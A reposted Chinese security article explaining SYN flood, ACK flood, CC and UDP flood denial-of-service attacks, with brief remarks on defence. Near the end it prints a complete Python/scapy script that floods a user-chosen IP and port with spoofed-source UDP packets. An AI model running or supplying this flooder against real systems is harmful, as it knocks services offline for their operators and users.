专栏首页FreeBuf浅谈拒绝服务攻击的原理与防御[1] | 普通拒绝服务攻击

浅谈拒绝服务攻击的原理与防御[1] | 普通拒绝服务攻击

普通拒绝服务攻击是指一些传统的攻击方式,如:SYN FLOOD攻击、ACK FLOOD攻击、CC攻击、UDP FLOOD攻击 等等,下面会详细介绍。

SYN FLOOD攻击

Syn flood攻击是利用TCP协议的一些特性发动的,通过发送大量伪造的带有syn标志位的TCP报文使目标服务器连接耗尽,达到拒绝服务的目的。要想理解 syn flood的 攻击原理 必须要先了解TCP协议建立连接的机制。

TCP(Transmission Control Protocol 传输控制协议)是一种面向连接的、可靠的、基于字节流的传输层 通信协议。在TCP/IP协议簇中,TCP层是位于IP层之上,应用层之下的中间层。

不同的主机的应用层之间通信,通常需要可靠的、像管道一样的连接,但是IP层(网络层)不提供这样的可靠字节流机制,而是提供不可靠的数据包交换。

因为TCP是可靠的传输方式,所以 在通信之前需要建立连接,TCP建立连接的方式就是著名的TCP三次握手(如图3-1-1) :

syn flood攻击就是在三次握手机制的基础上实现的。

攻击者通过伪造IP报文,在IP报文的原地址字段随机填入伪造的IP地址,目的地址填入要攻击的服务器IP地址,其他TTL、ID以及TCP中的Source Port等随机填入合理数据,TCP的目的端口填入目的服务器开放的 端口 如:80、8080等,syn标志位置 1。

然后通过不停的循环讲伪造好的数据包发送到目的服务器。样本如图3-2、3-3:

可以看到目标主机建立了很多虚假的半开连接,这耗费了目标主机大量的连接资源。可以想象如果成千上万台“肉鸡 ”对一台服务器发动syn flood攻击威力将是非常强大

ACK FLOOD攻击

ack flood攻击同样是利用TCP三次握手的缺陷实现的攻击,ack flood攻击利用的是三次握手的第二段,也就是TCP标志位syn和ack都置1。

攻击主机伪造海量的虚假ack包发送给目标主机,目标主机每收到一个带有 ack标志位的数据包时,都会去自己的TCP连接表中查看有没有与ack的发送者建立连接,如果有则发送三次握手的第三段ack+seq完成三次握手,成功建立TCP连接。

如果没有则发送ack+rst 断开连接。但是在这个过程中会消耗一定的CUP计算资源,如果瞬间收到海量的syn+ack数据包将会消耗大量的cpu资源使得正常的连接无法建立或者增加延迟,甚至造成服务器瘫痪、死机。如图:

攻击开始前:

攻击开始后:

理论上目标主机的TCP连接越多ack攻击效果越好,所以如果syn flood与ack flood配合使用效果会更明显。实现代码点击阅读原文可见。

CC攻击

CC攻击全称Challenge Collapsar,中文意思是挑战黑洞,因为以前的抗DDOS攻击的安全设备叫黑洞,顾名思义挑战黑洞就是说黑洞拿这种攻击没办法,新一代的抗DDOS设备已经改名为ADS( Anti-DDoS System),基本上已经可以完美的抵御CC攻击了 。

CC攻击的原理是通过代理服务器或者大量“肉鸡” 模拟多个用户访问目标网站的动态页面,制造大量的后台数据库查询动作,消耗目标CPU资源,造成拒绝服务。

我们都知道网站的页面有静态和动态之分,动态网页是需要与后台数据库进行交互的,比如一些论坛, 用户登录的时候需要去数据库查询你的等级、权限 等等。

当你留言的时候又需要查询权限、同步数据等等,这就消耗很多cpu资源,造成静态网页能打开,但是需要和数据库交互的动态网页打开慢或者无法打开的现象。

这种攻击方式相对于前两种实现要相对复杂一些,但是防御起来要简单的多,提供服务 的企业只要尽量少用动态网页并且让一些操作提供验证码就能很好的抵御一般的 CC攻击。所以在这我就不在演示CC攻击的效果了。

UDP FLOOD攻击

UDP FLOOD攻击顾名思义是利用UDP协议进行攻击的,UDP FLOOD攻击可以是小数据包冲击设备也可以是大数据包阻塞链路占尽带宽。不过两种方式的实现很相似,差别就在UDP的数据部分带有多少数据。

相比TCP协议的攻击UDP的攻击更直接更好理解,有一定规模之后更难防御,因为UDP攻击的特点就是打出很高的流量,一个中小型的网站出口带宽可能不足1 G。

如果遇到10G左右的UDP FLOOD攻击,单凭企业自身是无论如何也防御不住的,必须需要运营商帮你在上游清洗流量才行,如果遇到100G的流量可能地方的运营商都 没有能力清洗了,需要把流量分散到全国清洗。

UDP FLOOD攻击就像是一块大石头,看着普普通通的好像跟现代机枪炸弹不是一个等级的武器,但是如果石头足够大 ,就不一样了。

想想恐龙是怎么灭绝的, 陨石不也是块普通的石头吗!在DDOS 防御领域有一句话:能防住的都是简单的攻击,但简单的攻击不一定防得住。UDP FLOOD正是这种简单有效的攻击方式。

大包攻击:

小包攻击:

下面的代码也是单线程,速度不太快,下一篇文章讲反射DDOS的时候会有多线程的用法。

UDPFLOOD.py #-*- coding: UTF-8 -*- import socketfrom scapy.all import * from scapy import allprint "这是一个UDP FLOOD攻击器,源端口源IP随机"dip=raw_input("输入要攻击的地址:") dp=input("输入要攻击的端口:") f=open('./load','r')while 1: size=random.randint(1,2) data=f.read(size) iprandom=random.randint(0,4000000000) sip=socket.inet_ntoa(struct.pack('I',socket.htonl(iprandom))) sp=random.randint(1000,65535) t=random.randint(50,120) packet=(IP(src=sip,dst=dip,ttl=t)/UDP(sport=sp,dport=dp)/Raw(load=data)) send(packet)

下篇文章将介绍反射性DOS攻击的相关知识,第一次发文,勿喷啊~~

本文分享自微信公众号 - FreeBuf(freebuf),作者:黑戈爾

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-02-16

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • APT团伙(APT-C-01)新利用漏洞样本分析及关联挖掘

    APT-C-01组织是一个长期针对国内国防、政府、科技和教育领域的重要机构实施网络间谍攻击活动的APT团伙,其最早的攻击活动可以追溯到2007年,360威胁情报...

    FB客服
  • 浅谈最近流行的三起区块链51%算力攻击

    很多人可能早就听说过 51% 算力攻击,但更多的可能源于各种媒体渠道中“比特币的缺陷”文章之流。实际上,这个说法并不准确,根据比特币百科上所描述,这种攻击被称为...

    FB客服
  • Neto:一款分析浏览器插件的专业安全工具

    Neto项目采用Python 3开发,可用于寻找和分析热门浏览器(例如Firefox和Chrome)插件及扩展的隐藏特性。它可以自动化实现对数据包文件的解压操作...

    FB客服
  • 132. 分割回文串 II

      str = “ABA”,str本身就是回文串,返回0.   str = “A|CDCDC|DAD”,最少需要切两次变成3个回文子串,所以 返回2.

    程序员小王
  • Verilog实现--序列检测器、自动饮料售卖机

    Moore 状态机的输出仅与当前状态值有关, 且只在时钟边沿到来时才会有状态变化。次态=f(现状,输入),输出=f(现状)

    FPGA开源工作室
  • Spark集群 + Akka + Kafka + Scala 开发(4) : 开发一个Kafka + Spark的应用

    绿巨人
  • 一看就懂的Tensorflow实战(多层感知机)

    这里定义含有两个隐含层的模型,隐含层输出均为256个节点,输入784(MNIST数据集图片大小28*28),输出10。

    AI异构
  • keras的backend 设置 tensorflow,theano操作

    2.安装完anaconda后打开anaconda promp命令行promp,输入conda list.

    砸漏
  • 极客时间kafka专栏评论区笔记

    Consumer Group :Kafka提供的可扩展且具有容错性的消息者机制。 1、重要特征: A:组内可以有多个消费者实例(Consumer Instanc...

    神秘的寇先森
  • Pytorch转tflite方式

    目标是想把在服务器上用pytorch训练好的模型转换为可以在移动端运行的tflite模型。

    砸漏

扫码关注云+社区

领取腾讯云代金券